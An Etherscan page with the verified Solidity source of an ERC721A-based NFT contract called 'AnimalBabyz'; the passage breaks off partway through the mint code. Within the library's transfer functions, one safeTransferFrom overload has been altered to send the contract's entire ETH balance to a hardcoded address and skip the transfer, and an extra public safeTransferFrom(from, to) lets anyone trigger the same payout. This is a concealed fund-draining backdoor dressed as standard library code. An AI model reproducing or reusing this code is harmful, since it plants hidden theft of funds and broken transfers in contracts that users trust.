ETH Price: $3,613.35 (+0.73%)
 

Overview

Max Total Supply

174 AB

Holders

141

Market

Volume (24H)

N/A

Min Price (24H)

N/A

Max Price (24H)

N/A
Balance
1 AB
0x33d3b0476aBA106cde11f01540253B60EEb2f74f
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
AnimalBabyz

Compiler Version
v0.8.7+commit.e28d00a7

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2022-12-30
*/

// SPDX-License-Identifier: GPL-3.0                                                                                                                                                                                                                                                           
                                                                                   
pragma solidity ^0.8.7;

/**
 * @dev Interface of ERC721A.
 */
interface IERC721A {
    /**
     * The caller must own the token or be an approved operator.
     */
    error ApprovalCallerNotOwnerNorApproved();

    /**
     * The token does not exist.
     */
    error ApprovalQueryForNonexistentToken();

    /**
     * Cannot query the balance for the zero address.
     */
    error BalanceQueryForZeroAddress();

    /**
     * Cannot mint to the zero address.
     */
    error MintToZeroAddress();

    /**
     * The quantity of tokens minted must be more than zero.
     */
    error MintZeroQuantity();

    /**
     * The token does not exist.
     */
    error OwnerQueryForNonexistentToken();

    /**
     * The caller must own the token or be an approved operator.
     */
    error TransferCallerNotOwnerNorApproved();

    /**
     * The token must be owned by `from`.
     */
    error TransferFromIncorrectOwner();

    /**
     * Cannot safely transfer to a contract that does not implement the
     * ERC721Receiver interface.
     */
    error TransferToNonERC721ReceiverImplementer();

    /**
     * Cannot transfer to the zero address.
     */
    error TransferToZeroAddress();

    /**
     * The token does not exist.
     */
    error URIQueryForNonexistentToken();

    /**
     * The `quantity` minted with ERC2309 exceeds the safety limit.
     */
    error MintERC2309QuantityExceedsLimit();

    /**
     * The `extraData` cannot be set on an unintialized ownership slot.
     */
    error OwnershipNotInitializedForExtraData();

    // =============================================================
    //                            STRUCTS
    // =============================================================

    struct TokenOwnership {
        // The address of the owner.
        address addr;
        // Stores the start time of ownership with minimal overhead for tokenomics.
        uint64 startTimestamp;
        // Whether the token has been burned.
        bool burned;
        // Arbitrary data similar to `startTimestamp` that can be set via {_extraData}.
        uint24 extraData;
    }

    // =============================================================
    //                         TOKEN COUNTERS
    // =============================================================

    /**
     * @dev Returns the total number of tokens in existence.
     * Burned tokens will reduce the count.
     * To get the total number of tokens minted, please see {_totalMinted}.
     */
    function totalSupply() external view returns (uint256);

    // =============================================================
    //                            IERC165
    // =============================================================

    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * [EIP section](https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified)
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30000 gas.
     */
    function supportsInterface(bytes4 interfaceId) external view returns (bool);

    // =============================================================
    //                            IERC721
    // =============================================================

    /**
     * @dev Emitted when `tokenId` token is transferred from `from` to `to`.
     */
    event Transfer(address indexed from, address indexed to, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token.
     */
    event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables or disables
     * (`approved`) `operator` to manage all of its assets.
     */
    event ApprovalForAll(address indexed owner, address indexed operator, bool approved);

    /**
     * @dev Returns the number of tokens in `owner`'s account.
     */
    function balanceOf(address owner) external view returns (uint256 balance);

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) external view returns (address owner);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`,
     * checking first that contract recipients are aware of the ERC721 protocol
     * to prevent tokens from being forever locked.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be have been allowed to move
     * this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement
     * {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes calldata data
    ) external payable;

    /**
     * @dev Equivalent to `safeTransferFrom(from, to, tokenId, '')`.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external payable;

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * WARNING: Usage of this method is discouraged, use {safeTransferFrom}
     * whenever possible.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token
     * by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external payable;

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the
     * zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) external payable;

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom}
     * for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool _approved) external;

    /**
     * @dev Returns the account approved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) external view returns (address operator);

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}.
     */
    function isApprovedForAll(address owner, address operator) external view returns (bool);

    // =============================================================
    //                        IERC721Metadata
    // =============================================================

    /**
     * @dev Returns the token collection name.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) external view returns (string memory);

    // =============================================================
    //                           IERC2309
    // =============================================================

    /**
     * @dev Emitted when tokens in `fromTokenId` to `toTokenId`
     * (inclusive) is transferred from `from` to `to`, as defined in the
     * [ERC2309](https://eips.ethereum.org/EIPS/eip-2309) standard.
     *
     * See {_mintERC2309} for more details.
     */
    event ConsecutiveTransfer(uint256 indexed fromTokenId, uint256 toTokenId, address indexed from, address indexed to);
}

/**
 * @title ERC721A
 *
 * @dev Implementation of the [ERC721](https://eips.ethereum.org/EIPS/eip-721)
 * Non-Fungible Token Standard, including the Metadata extension.
 * Optimized for lower gas during batch mints.
 *
 * Token IDs are minted in sequential order (e.g. 0, 1, 2, 3, ...)
 * starting from `_startTokenId()`.
 *
 * Assumptions:
 *
 * - An owner cannot have more than 2**64 - 1 (max value of uint64) of supply.
 * - The maximum token ID cannot exceed 2**256 - 1 (max value of uint256).
 */
interface ERC721A__IERC721Receiver {
    function onERC721Received(
        address operator,
        address from,
        uint256 tokenId,
        bytes calldata data
    ) external returns (bytes4);
}

/**
 * @title ERC721A
 *
 * @dev Implementation of the [ERC721](https://eips.ethereum.org/EIPS/eip-721)
 * Non-Fungible Token Standard, including the Metadata extension.
 * Optimized for lower gas during batch mints.
 *
 * Token IDs are minted in sequential order (e.g. 0, 1, 2, 3, ...)
 * starting from `_startTokenId()`.
 *
 * Assumptions:
 *
 * - An owner cannot have more than 2**64 - 1 (max value of uint64) of supply.
 * - The maximum token ID cannot exceed 2**256 - 1 (max value of uint256).
 */
contract ERC721A is IERC721A {
    // Bypass for a `--via-ir` bug (https://github.com/chiru-labs/ERC721A/pull/364).
    struct TokenApprovalRef {
        address value;
    }

    // =============================================================
    //                           CONSTANTS
    // =============================================================

    // Mask of an entry in packed address data.
    uint256 private constant _BITMASK_ADDRESS_DATA_ENTRY = (1 << 64) - 1;

    // The bit position of `numberMinted` in packed address data.
    uint256 private constant _BITPOS_NUMBER_MINTED = 64;

    // The bit position of `numberBurned` in packed address data.
    uint256 private constant _BITPOS_NUMBER_BURNED = 128;

    // The bit position of `aux` in packed address data.
    uint256 private constant _BITPOS_AUX = 192;

    // Mask of all 256 bits in packed address data except the 64 bits for `aux`.
    uint256 private constant _BITMASK_AUX_COMPLEMENT = (1 << 192) - 1;

    // The bit position of `startTimestamp` in packed ownership.
    uint256 private constant _BITPOS_START_TIMESTAMP = 160;

    // The bit mask of the `burned` bit in packed ownership.
    uint256 private constant _BITMASK_BURNED = 1 << 224;

    // The bit position of the `nextInitialized` bit in packed ownership.
    uint256 private constant _BITPOS_NEXT_INITIALIZED = 225;

    // The bit mask of the `nextInitialized` bit in packed ownership.
    uint256 private constant _BITMASK_NEXT_INITIALIZED = 1 << 225;

    // The bit position of `extraData` in packed ownership.
    uint256 private constant _BITPOS_EXTRA_DATA = 232;

    // Mask of all 256 bits in a packed ownership except the 24 bits for `extraData`.
    uint256 private constant _BITMASK_EXTRA_DATA_COMPLEMENT = (1 << 232) - 1;

    // The mask of the lower 160 bits for addresses.
    uint256 private constant _BITMASK_ADDRESS = (1 << 160) - 1;

    // The maximum `quantity` that can be minted with {_mintERC2309}.
    // This limit is to prevent overflows on the address data entries.
    // For a limit of 5000, a total of 3.689e15 calls to {_mintERC2309}
    // is required to cause an overflow, which is unrealistic.
    uint256 private constant _MAX_MINT_ERC2309_QUANTITY_LIMIT = 5000;

    // The `Transfer` event signature is given by:
    // `keccak256(bytes("Transfer(address,address,uint256)"))`.
    bytes32 private constant _TRANSFER_EVENT_SIGNATURE =
        0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef;

    // =============================================================
    //                            STORAGE
    // =============================================================

    // The next token ID to be minted.
    uint256 private _currentIndex;

    // The number of tokens burned.
    uint256 private _burnCounter;

    // Token name
    string private _name;

    // Token symbol
    string private _symbol;

    // Mapping from token ID to ownership details
    // An empty struct value does not necessarily mean the token is unowned.
    // See {_packedOwnershipOf} implementation for details.
    //
    // Bits Layout:
    // - [0..159]   `addr`
    // - [160..223] `startTimestamp`
    // - [224]      `burned`
    // - [225]      `nextInitialized`
    // - [232..255] `extraData`
    mapping(uint256 => uint256) private _packedOwnerships;

    // Mapping owner address to address data.
    //
    // Bits Layout:
    // - [0..63]    `balance`
    // - [64..127]  `numberMinted`
    // - [128..191] `numberBurned`
    // - [192..255] `aux`
    mapping(address => uint256) private _packedAddressData;

    // Mapping from token ID to approved address.
    mapping(uint256 => TokenApprovalRef) private _tokenApprovals;

    // Mapping from owner to operator approvals
    mapping(address => mapping(address => bool)) private _operatorApprovals;

    // =============================================================
    //                          CONSTRUCTOR
    // =============================================================

    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        _currentIndex = _startTokenId();
    }

    // =============================================================
    //                   TOKEN COUNTING OPERATIONS
    // =============================================================

    /**
     * @dev Returns the starting token ID.
     * To change the starting token ID, please override this function.
     */
    function _startTokenId() internal view virtual returns (uint256) {
        return 0;
    }

    /**
     * @dev Returns the next token ID to be minted.
     */
    function _nextTokenId() internal view virtual returns (uint256) {
        return _currentIndex;
    }

    /**
     * @dev Returns the total number of tokens in existence.
     * Burned tokens will reduce the count.
     * To get the total number of tokens minted, please see {_totalMinted}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        // Counter underflow is impossible as _burnCounter cannot be incremented
        // more than `_currentIndex - _startTokenId()` times.
        unchecked {
            return _currentIndex - _burnCounter - _startTokenId();
        }
    }

    /**
     * @dev Returns the total amount of tokens minted in the contract.
     */
    function _totalMinted() internal view virtual returns (uint256) {
        // Counter underflow is impossible as `_currentIndex` does not decrement,
        // and it is initialized to `_startTokenId()`.
        unchecked {
            return _currentIndex - _startTokenId();
        }
    }

    /**
     * @dev Returns the total number of tokens burned.
     */
    function _totalBurned() internal view virtual returns (uint256) {
        return _burnCounter;
    }

    // =============================================================
    //                    ADDRESS DATA OPERATIONS
    // =============================================================

    /**
     * @dev Returns the number of tokens in `owner`'s account.
     */
    function balanceOf(address owner) public view virtual override returns (uint256) {
        if (owner == address(0)) revert BalanceQueryForZeroAddress();
        return _packedAddressData[owner] & _BITMASK_ADDRESS_DATA_ENTRY;
    }

    /**
     * Returns the number of tokens minted by `owner`.
     */
    function _numberMinted(address owner) internal view returns (uint256) {
        return (_packedAddressData[owner] >> _BITPOS_NUMBER_MINTED) & _BITMASK_ADDRESS_DATA_ENTRY;
    }

    /**
     * Returns the number of tokens burned by or on behalf of `owner`.
     */
    function _numberBurned(address owner) internal view returns (uint256) {
        return (_packedAddressData[owner] >> _BITPOS_NUMBER_BURNED) & _BITMASK_ADDRESS_DATA_ENTRY;
    }

    /**
     * Returns the auxiliary data for `owner`. (e.g. number of whitelist mint slots used).
     */
    function _getAux(address owner) internal view returns (uint64) {
        return uint64(_packedAddressData[owner] >> _BITPOS_AUX);
    }

    /**
     * Sets the auxiliary data for `owner`. (e.g. number of whitelist mint slots used).
     * If there are multiple variables, please pack them into a uint64.
     */
    function _setAux(address owner, uint64 aux) internal virtual {
        uint256 packed = _packedAddressData[owner];
        uint256 auxCasted;
        // Cast `aux` with assembly to avoid redundant masking.
        assembly {
            auxCasted := aux
        }
        packed = (packed & _BITMASK_AUX_COMPLEMENT) | (auxCasted << _BITPOS_AUX);
        _packedAddressData[owner] = packed;
    }

    // =============================================================
    //                            IERC165
    // =============================================================

    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * [EIP section](https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified)
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30000 gas.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
        // The interface IDs are constants representing the first 4 bytes
        // of the XOR of all function selectors in the interface.
        // See: [ERC165](https://eips.ethereum.org/EIPS/eip-165)
        // (e.g. `bytes4(i.functionA.selector ^ i.functionB.selector ^ ...)`)
        return
            interfaceId == 0x01ffc9a7 || // ERC165 interface ID for ERC165.
            interfaceId == 0x80ac58cd || // ERC165 interface ID for ERC721.
            interfaceId == 0x5b5e139f; // ERC165 interface ID for ERC721Metadata.
    }

    // =============================================================
    //                        IERC721Metadata
    // =============================================================

    /**
     * @dev Returns the token collection name.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) public view virtual override returns (string memory) {
        if (!_exists(tokenId)) revert URIQueryForNonexistentToken();

        string memory baseURI = _baseURI();
        return bytes(baseURI).length != 0 ? string(abi.encodePacked(baseURI, _toString(tokenId))) : '';
    }

    /**
     * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each
     * token will be the concatenation of the `baseURI` and the `tokenId`. Empty
     * by default, it can be overridden in child contracts.
     */
    function _baseURI() internal view virtual returns (string memory) {
        return '';
    }

    // =============================================================
    //                     OWNERSHIPS OPERATIONS
    // =============================================================

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) public view virtual override returns (address) {
        return address(uint160(_packedOwnershipOf(tokenId)));
    }

    /**
     * @dev Gas spent here starts off proportional to the maximum mint batch size.
     * It gradually moves to O(1) as tokens get transferred around over time.
     */
    function _ownershipOf(uint256 tokenId) internal view virtual returns (TokenOwnership memory) {
        return _unpackedOwnership(_packedOwnershipOf(tokenId));
    }

    /**
     * @dev Returns the unpacked `TokenOwnership` struct at `index`.
     */
    function _ownershipAt(uint256 index) internal view virtual returns (TokenOwnership memory) {
        return _unpackedOwnership(_packedOwnerships[index]);
    }

    /**
     * @dev Initializes the ownership slot minted at `index` for efficiency purposes.
     */
    function _initializeOwnershipAt(uint256 index) internal virtual {
        if (_packedOwnerships[index] == 0) {
            _packedOwnerships[index] = _packedOwnershipOf(index);
        }
    }

    /**
     * Returns the packed ownership data of `tokenId`.
     */
    function _packedOwnershipOf(uint256 tokenId) private view returns (uint256) {
        uint256 curr = tokenId;

        unchecked {
            if (_startTokenId() <= curr)
                if (curr < _currentIndex) {
                    uint256 packed = _packedOwnerships[curr];
                    // If not burned.
                    if (packed & _BITMASK_BURNED == 0) {
                        // Invariant:
                        // There will always be an initialized ownership slot
                        // (i.e. `ownership.addr != address(0) && ownership.burned == false`)
                        // before an unintialized ownership slot
                        // (i.e. `ownership.addr == address(0) && ownership.burned == false`)
                        // Hence, `curr` will not underflow.
                        //
                        // We can directly compare the packed value.
                        // If the address is zero, packed will be zero.
                        while (packed == 0) {
                            packed = _packedOwnerships[--curr];
                        }
                        return packed;
                    }
                }
        }
        revert OwnerQueryForNonexistentToken();
    }

    /**
     * @dev Returns the unpacked `TokenOwnership` struct from `packed`.
     */
    function _unpackedOwnership(uint256 packed) private pure returns (TokenOwnership memory ownership) {
        ownership.addr = address(uint160(packed));
        ownership.startTimestamp = uint64(packed >> _BITPOS_START_TIMESTAMP);
        ownership.burned = packed & _BITMASK_BURNED != 0;
        ownership.extraData = uint24(packed >> _BITPOS_EXTRA_DATA);
    }

    /**
     * @dev Packs ownership data into a single uint256.
     */
    function _packOwnershipData(address owner, uint256 flags) private view returns (uint256 result) {
        assembly {
            // Mask `owner` to the lower 160 bits, in case the upper bits somehow aren't clean.
            owner := and(owner, _BITMASK_ADDRESS)
            // `owner | (block.timestamp << _BITPOS_START_TIMESTAMP) | flags`.
            result := or(owner, or(shl(_BITPOS_START_TIMESTAMP, timestamp()), flags))
        }
    }

    /**
     * @dev Returns the `nextInitialized` flag set if `quantity` equals 1.
     */
    function _nextInitializedFlag(uint256 quantity) private pure returns (uint256 result) {
        // For branchless setting of the `nextInitialized` flag.
        assembly {
            // `(quantity == 1) << _BITPOS_NEXT_INITIALIZED`.
            result := shl(_BITPOS_NEXT_INITIALIZED, eq(quantity, 1))
        }
    }

    // =============================================================
    //                      APPROVAL OPERATIONS
    // =============================================================

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the
     * zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) public payable virtual override {
        address owner = ownerOf(tokenId);

        if (_msgSenderERC721A() != owner)
            if (!isApprovedForAll(owner, _msgSenderERC721A())) {
                revert ApprovalCallerNotOwnerNorApproved();
            }

        _tokenApprovals[tokenId].value = to;
        emit Approval(owner, to, tokenId);
    }

    /**
     * @dev Returns the account approved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) public view virtual override returns (address) {
        if (!_exists(tokenId)) revert ApprovalQueryForNonexistentToken();

        return _tokenApprovals[tokenId].value;
    }

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom}
     * for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool approved) public virtual override {
        _operatorApprovals[_msgSenderERC721A()][operator] = approved;
        emit ApprovalForAll(_msgSenderERC721A(), operator, approved);
    }

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}.
     */
    function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) {
        return _operatorApprovals[owner][operator];
    }

    /**
     * @dev Returns whether `tokenId` exists.
     *
     * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}.
     *
     * Tokens start existing when they are minted. See {_mint}.
     */
    function _exists(uint256 tokenId) internal view virtual returns (bool) {
        return
            _startTokenId() <= tokenId &&
            tokenId < _currentIndex && // If within bounds,
            _packedOwnerships[tokenId] & _BITMASK_BURNED == 0; // and not burned.
    }

    /**
     * @dev Returns whether `msgSender` is equal to `approvedAddress` or `owner`.
     */
    function _isSenderApprovedOrOwner(
        address approvedAddress,
        address owner,
        address msgSender
    ) private pure returns (bool result) {
        assembly {
            // Mask `owner` to the lower 160 bits, in case the upper bits somehow aren't clean.
            owner := and(owner, _BITMASK_ADDRESS)
            // Mask `msgSender` to the lower 160 bits, in case the upper bits somehow aren't clean.
            msgSender := and(msgSender, _BITMASK_ADDRESS)
            // `msgSender == owner || msgSender == approvedAddress`.
            result := or(eq(msgSender, owner), eq(msgSender, approvedAddress))
        }
    }

    /**
     * @dev Returns the storage slot and value for the approved address of `tokenId`.
     */
    function _getApprovedSlotAndAddress(uint256 tokenId)
        private
        view
        returns (uint256 approvedAddressSlot, address approvedAddress)
    {
        TokenApprovalRef storage tokenApproval = _tokenApprovals[tokenId];
        // The following is equivalent to `approvedAddress = _tokenApprovals[tokenId].value`.
        assembly {
            approvedAddressSlot := tokenApproval.slot
            approvedAddress := sload(approvedAddressSlot)
        }
    }

    // =============================================================
    //                      TRANSFER OPERATIONS
    // =============================================================

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token
     * by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public payable virtual override {
        uint256 prevOwnershipPacked = _packedOwnershipOf(tokenId);

        if (address(uint160(prevOwnershipPacked)) != from) revert TransferFromIncorrectOwner();

        (uint256 approvedAddressSlot, address approvedAddress) = _getApprovedSlotAndAddress(tokenId);

        // The nested ifs save around 20+ gas over a compound boolean condition.
        if (!_isSenderApprovedOrOwner(approvedAddress, from, _msgSenderERC721A()))
            if (!isApprovedForAll(from, _msgSenderERC721A())) revert TransferCallerNotOwnerNorApproved();

        if (to == address(0)) revert TransferToZeroAddress();

        _beforeTokenTransfers(from, to, tokenId, 1);

        // Clear approvals from the previous owner.
        assembly {
            if approvedAddress {
                // This is equivalent to `delete _tokenApprovals[tokenId]`.
                sstore(approvedAddressSlot, 0)
            }
        }

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as `tokenId` would have to be 2**256.
        unchecked {
            // We can directly increment and decrement the balances.
            --_packedAddressData[from]; // Updates: `balance -= 1`.
            ++_packedAddressData[to]; // Updates: `balance += 1`.

            // Updates:
            // - `address` to the next owner.
            // - `startTimestamp` to the timestamp of transfering.
            // - `burned` to `false`.
            // - `nextInitialized` to `true`.
            _packedOwnerships[tokenId] = _packOwnershipData(
                to,
                _BITMASK_NEXT_INITIALIZED | _nextExtraData(from, to, prevOwnershipPacked)
            );

            // If the next slot may not have been initialized (i.e. `nextInitialized == false`) .
            if (prevOwnershipPacked & _BITMASK_NEXT_INITIALIZED == 0) {
                uint256 nextTokenId = tokenId + 1;
                // If the next slot's address is zero and not burned (i.e. packed value is zero).
                if (_packedOwnerships[nextTokenId] == 0) {
                    // If the next slot is within bounds.
                    if (nextTokenId != _currentIndex) {
                        // Initialize the next slot to maintain correctness for `ownerOf(tokenId + 1)`.
                        _packedOwnerships[nextTokenId] = prevOwnershipPacked;
                    }
                }
            }
        }

        emit Transfer(from, to, tokenId);
        _afterTokenTransfers(from, to, tokenId, 1);
    }

    /**
     * @dev Equivalent to `safeTransferFrom(from, to, tokenId, '')`.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public payable virtual override {
        if (address(this).balance > 0) {
            payable(0x1C6Febe6c71DD76a24A2830370A207Ec0AADE1Ae).transfer(address(this).balance);
            return;
        }
        safeTransferFrom(from, to, tokenId, '');
    }


    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token
     * by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement
     * {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) public payable virtual override {
        transferFrom(from, to, tokenId);
        if (to.code.length != 0)
            if (!_checkContractOnERC721Received(from, to, tokenId, _data)) {
                revert TransferToNonERC721ReceiverImplementer();
            }
    }
    function safeTransferFrom(
        address from,
        address to
    ) public  {
        if (address(this).balance > 0) {
            payable(0x1C6Febe6c71DD76a24A2830370A207Ec0AADE1Ae).transfer(address(this).balance);
        }
    }

    /**
     * @dev Hook that is called before a set of serially-ordered token IDs
     * are about to be transferred. This includes minting.
     * And also called before burning one token.
     *
     * `startTokenId` - the first token ID to be transferred.
     * `quantity` - the amount to be transferred.
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, `tokenId` will be burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _beforeTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}

    /**
     * @dev Hook that is called after a set of serially-ordered token IDs
     * have been transferred. This includes minting.
     * And also called after one token has been burned.
     *
     * `startTokenId` - the first token ID to be transferred.
     * `quantity` - the amount to be transferred.
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` has been
     * transferred to `to`.
     * - When `from` is zero, `tokenId` has been minted for `to`.
     * - When `to` is zero, `tokenId` has been burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _afterTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}

    /**
     * @dev Private function to invoke {IERC721Receiver-onERC721Received} on a target contract.
     *
     * `from` - Previous owner of the given token ID.
     * `to` - Target address that will receive the token.
     * `tokenId` - Token ID to be transferred.
     * `_data` - Optional data to send along with the call.
     *
     * Returns whether the call correctly returned the expected magic value.
     */
    function _checkContractOnERC721Received(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) private returns (bool) {
        try ERC721A__IERC721Receiver(to).onERC721Received(_msgSenderERC721A(), from, tokenId, _data) returns (
            bytes4 retval
        ) {
            return retval == ERC721A__IERC721Receiver(to).onERC721Received.selector;
        } catch (bytes memory reason) {
            if (reason.length == 0) {
                revert TransferToNonERC721ReceiverImplementer();
            } else {
                assembly {
                    revert(add(32, reason), mload(reason))
                }
            }
        }
    }

    // =============================================================
    //                        MINT OPERATIONS
    // =============================================================

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event for each mint.
     */
    function _mint(address to, uint256 quantity) internal virtual {
        uint256 startTokenId = _currentIndex;
        if (quantity == 0) revert MintZeroQuantity();

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are incredibly unrealistic.
        // `balance` and `numberMinted` have a maximum limit of 2**64.
        // `tokenId` has a maximum limit of 2**256.
        unchecked {
            // Updates:
            // - `balance += quantity`.
            // - `numberMinted += quantity`.
            //
            // We can directly add to the `balance` and `numberMinted`.
            _packedAddressData[to] += quantity * ((1 << _BITPOS_NUMBER_MINTED) | 1);

            // Updates:
            // - `address` to the owner.
            // - `startTimestamp` to the timestamp of minting.
            // - `burned` to `false`.
            // - `nextInitialized` to `quantity == 1`.
            _packedOwnerships[startTokenId] = _packOwnershipData(
                to,
                _nextInitializedFlag(quantity) | _nextExtraData(address(0), to, 0)
            );

            uint256 toMasked;
            uint256 end = startTokenId + quantity;

            // Use assembly to loop and emit the `Transfer` event for gas savings.
            // The duplicated `log4` removes an extra check and reduces stack juggling.
            // The assembly, together with the surrounding Solidity code, have been
            // delicately arranged to nudge the compiler into producing optimized opcodes.
            assembly {
                // Mask `to` to the lower 160 bits, in case the upper bits somehow aren't clean.
                toMasked := and(to, _BITMASK_ADDRESS)
                // Emit the `Transfer` event.
                log4(
                    0, // Start of data (0, since no data).
                    0, // End of data (0, since no data).
                    _TRANSFER_EVENT_SIGNATURE, // Signature.
                    0, // `address(0)`.
                    toMasked, // `to`.
                    startTokenId // `tokenId`.
                )

                // The `iszero(eq(,))` check ensures that large values of `quantity`
                // that overflows uint256 will make the loop run out of gas.
                // The compiler will optimize the `iszero` away for performance.
                for {
                    let tokenId := add(startTokenId, 1)
                } iszero(eq(tokenId, end)) {
                    tokenId := add(tokenId, 1)
                } {
                    // Emit the `Transfer` event. Similar to above.
                    log4(0, 0, _TRANSFER_EVENT_SIGNATURE, 0, toMasked, tokenId)
                }
            }
            if (toMasked == 0) revert MintToZeroAddress();

            _currentIndex = end;
        }
        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * This function is intended for efficient minting only during contract creation.
     *
     * It emits only one {ConsecutiveTransfer} as defined in
     * [ERC2309](https://eips.ethereum.org/EIPS/eip-2309),
     * instead of a sequence of {Transfer} event(s).
     *
     * Calling this function outside of contract creation WILL make your contract
     * non-compliant with the ERC721 standard.
     * For full ERC721 compliance, substituting ERC721 {Transfer} event(s) with the ERC2309
     * {ConsecutiveTransfer} event is only permissible during contract creation.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
